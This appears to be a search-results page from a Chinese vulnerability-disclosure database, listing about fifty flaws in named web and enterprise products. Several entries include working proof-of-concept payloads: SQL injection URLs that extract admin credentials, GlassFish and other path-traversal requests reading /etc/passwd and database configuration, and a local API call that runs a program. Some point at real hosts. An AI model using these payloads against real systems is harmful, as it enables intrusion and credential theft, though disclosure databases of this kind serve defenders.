56796 matches found
YouYaX V5.47 论坛前台任意账户登入(cookie伪造)漏洞
No description provided by source...
方维订餐系统shop.php sql注入漏洞
sql报错注入 漏洞位置: /shop.php?ctl=index&act=ajaxpurposestore&purposeid=1 参数purposeid 存在sql注入 poc:/shop.php?ctl=index&act=ajaxpurposestore&purposeid=1%20and%20select//%201%20from//%20select//%20count,concatmd51,floorrand02x%20from//%20informationschema.tables%20group%20by%20xa...
TRS IDS 信息泄露
No description provided by source...
Ruby colorscore gem任意代码执行漏洞
No description provided by source...
Android Trustzone 权限提升漏洞
No description provided by source...
RuvarOA协同办公软件Include/get_dict.ashx bt_id参数SQL注入漏洞
No description provided by source...
Pitivi任意命令执行漏洞
No description provided by source...
Emlog 5.3.1 flash xss
No description provided by source...
phpyunV4.0 /app/public/action.class.php SQL注入漏洞
No description provided by source...
Shop7z /show.asp pkid参数SQL注入漏洞
exp:show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,suser,9,10,11,12,13,14,15,16,spwd,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20Shop7zAdmin...
weaver 0A系统在com.eweaver.base.DataAction处存在任意SQL命令执行漏洞
No description provided by source...
Simple Ads Manager 2.9.4.116 - SQL Injection
No description provided by source...
shop7z Advsearchadmin.asp kindnum参数SQL注入漏洞
code 区域 Advsearchadmin.asp kindnum=trimrequest"kindnum" pipai=trimrequest"pipai" model=trimrequest"model" productname=trimrequest"productname" price11=trimrequest"price11" price12=trimrequest"price12" price21=trimrequest"price21" price22=trimrequest"price22" if price11="" then price11="0" if...
益用TMS在线培训系统mood/xinqing.aspx id参数SQL注入漏洞
No description provided by source...
Shop7z admin/lipinadd.asp越权访问
No description provided by source...
GlassFish 任意文件读取漏洞
java把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符"." 访问如下链接即可看到效果: http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 参考链接: 《漏洞预警:应用服务器glassfish任意文件读取漏洞》 !/usr/bin/env python coding...
Ubuntu Vivid本地提权漏洞
No description provided by source...
JCMS政务系统在/lm/front/mailwrite_over.jsp页面存在任意文件遍历漏洞
No description provided by source...
Android Bluetooth权限提升漏洞
No description provided by source...
StrongSoft灾害预警系统InfoDetail.aspx ADCD参数SQL注入漏洞
No description provided by source...
SiteFactory CMS的/manage/download.aspx处参数File存在任意文件下载漏洞
No description provided by source...
Shop7z show_foot.asp, showone.asp等文件SQL注入漏洞
问题参数:cid TEST:http://www.125309.com/showfoot.asp?cid=1 code 区域 Place: GET Parameter: cid Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace original va lue Payload: cid=IIF3932=3932,1,1/0 Type: UNION query Title: Generic UNION query NULL - 11 columns Payload...
eyou反垃圾邮件网关系统在/php/admin_login.php处存在SQL注入漏洞
No description provided by source...
QEMU rocker.c 栈缓冲区溢出漏洞
No description provided by source...
金蝶友商在线客服存在任意文件下载漏洞
简要描述: 详细说明: 打开链接:http://im.youshang.com/live800/downlog.jsp?path=/&fileName=/etc/passwd 可以下载passwd文件,内容如下: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...
Csdjcms在在app/controllers/open.php处存在SQL注入漏洞
No description provided by source...
strongSwan远程代码执行漏洞
No description provided by source...
Fanwe O2O商业系统index.php处的POST参数topic_id存在SQL注入漏洞
No description provided by source...
EduWind在线教育建站系统 /cms/article/index/cid/ SQL注入漏洞
No description provided by source...
Shop7z show_all.asp SQL注入漏洞
/showall.asp?cid=7685%20%20UNION%20SELECT%201%2C2%2C3%2C%27%21%21%21%27%2bsuser%2b%27%21%21%21%27%2C%27@%27%2bspwd%2b%27@%27%2C6%2C7%2C8%2C9%2C10%2C11%20from%20admin...
RuvarRHM select_baseinfo.aspx bt_name参数SQL注入漏洞
0x01 框架介绍 uvarHRM人力资源管理系统,汇集了众多成功企业先进的人力资源管理理念、人力资源管理实践、人力资源信息化系统建设的宝贵经验,以先进的信息技术,实现对企业人力资源信息的高度集成化管理,是适合中国企业使用的人力资源管理解决方案,为现代企业的成长与发展提供了先进、科学、务实的人力资源管理模式。 RuvarHRM采用基于IE浏览器的 B/S 结构,以人员管理、考勤管理、薪资管理、招聘管理、培训管理、合同管理、社保福利、绩效考核、报表中心为核心功能模块,是企业领导、HR经理和员工全员参与的,可多层次管理的集团版eHR系统。 官方主页:http://www.ruvar.com/...
Cacti 0.8.8f graphs_new.php SQL注入漏洞
关键代码如下 function formsave if isset$POST"savecomponentgraph" / summarize the 'create graph from host template/snmp index' stuff into an array / while list$var, $val = each$POST if pregmatch'/^cg\d+$/', $var, $matches $selectedgraphs"cg"$matches1$matches1 = true; //cgg is not filtered elseif...
用友ERP-NC系统/NCFindWeb接口任意文件下载
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码,如图: 也可以读取/etc/passwd,如图: 中粮集团,民生电商等大量企业受到影响...
workyi人才系统2.5版本/news/search.aspx 参数key存在SQL注入漏洞
0x01 框架介绍 工作易人才招聘系统是由华兴科技网络开发的一套高端人才系统,并通过了国家计算机版权认证中心的认可。由.NET+ MSSQL编写,网站模板采用DIV+CSS构成,兼容IE6/IE7/IE8、火狐等主流内核浏览器,当然也兼容IE内核的傲游、世界之窗、腾讯TT等浏览器。 该网站主要由企业招聘、万能采集、手机版、木马检测、一句求贤、最新求职、人才评测、视频简历、院校联盟、个人服务、企业服务、资讯中心几大部分组成。工作易人才招聘系统是面向中小企业和个人站长建站时,最具性价比的一套人才招聘系统。以《实用、稳定、低价》的特色占据市场的一席之地。采用微软的.Net最新技术开发。...
HearOA在/bnuoa/vfs处存在本地文件包含漏洞
No description provided by source...
趋势科技杀毒软件任意命令执行漏洞
当用户安装Windows版的趋势科技杀软,默认安装的组件包括了一个密码管理器,安装后会自动启动,密码管理器用JavaScript开发,内置监听localhost的node.js HTTP服务器,会打开多个HTTP RPC端口处理API 请求, 它存在一个任意命令执行漏洞,也就是任何网站都可以在安装趋势科技的电脑上执行命令。 比如运行计算器(https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe)。 漏洞发现者说,趋势的软件会关闭 Chromium 41 的沙盒,然后侮辱性的在...
docker 1.0.0 docker.socket world accessible
CVE-2014-3499 docker.socket world accessible 漏洞类型 设计错误 本地权限提升 漏洞分析 Docker 1.0.0使用全局可读可写的管理套接字,这种设计会允许本地用户利用写套接字,获得特殊的权限。 具体分析 docker.socket 在docker 1.0.0版本时,并没有限制读写socket的权限,导致本地用户任何socket读写都能够完成。 本地用户使用构造的恶意请求写入到socket中会导致root权限执行任意代码。 具体过程 在init/systemd中,...
农友软件建站系统erji.aspx deptid参数SQL注入漏洞
No description provided by source...
方维订餐系统 tuan.php code参数SQL注入漏洞
No description provided by source...
AppCMS v1.3 在index.php存在信息泄漏漏洞
No description provided by source...
AnyMacro邮件投递网关系统/login.php处存在SQL注入漏洞
No description provided by source...
Discuz问卷调查专业版插件参数orderby存在SQL注入漏洞
No description provided by source...
Netentsec ASG 网康应用安全网关在admin/config_ISCGroupTimePolicy.php等多处存在SQL注入漏洞
No description provided by source...
EuseTMS plancommentlist.aspx type SQL注射
No description provided by source...
天融信Top-App应用网关 change_lan.php 命令执行
public function set$package,$config,$option,$value $cmd = UCICMD." set ".$package.".".$config.".".$option."='".$value."'"; exec$cmd; http://61.148.24.182:8080/changelan.php...
多款三星打印机未授权访问缺陷
No description provided by source...
shopNC B2B版 /microshop/index.php处存在SQL注入漏洞
No description provided by source...
天融信 Top-App 应用网关 enable_tool_debug.php 命令执行漏洞
No description provided by source...
Joomla 组件Gallery WD SQL注入漏洞
0x01 漏洞简介 Joomla 组件Gallery WD存在多处SQL注入漏洞。远程攻击者可以利用该漏洞执行任意SQL指令。该插件的下载地址是: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd 0x02漏洞说明 2.1参数themeid存在GET型SQL注入漏洞 该漏洞利用的POC格式如下: index.php?option=comgallerywd&view=gallerybox&imageid=19&galleryid=2&themeid=1 AND...
Shop7z /show_foot.asp c_id参数SQL注入漏洞
No description provided by source...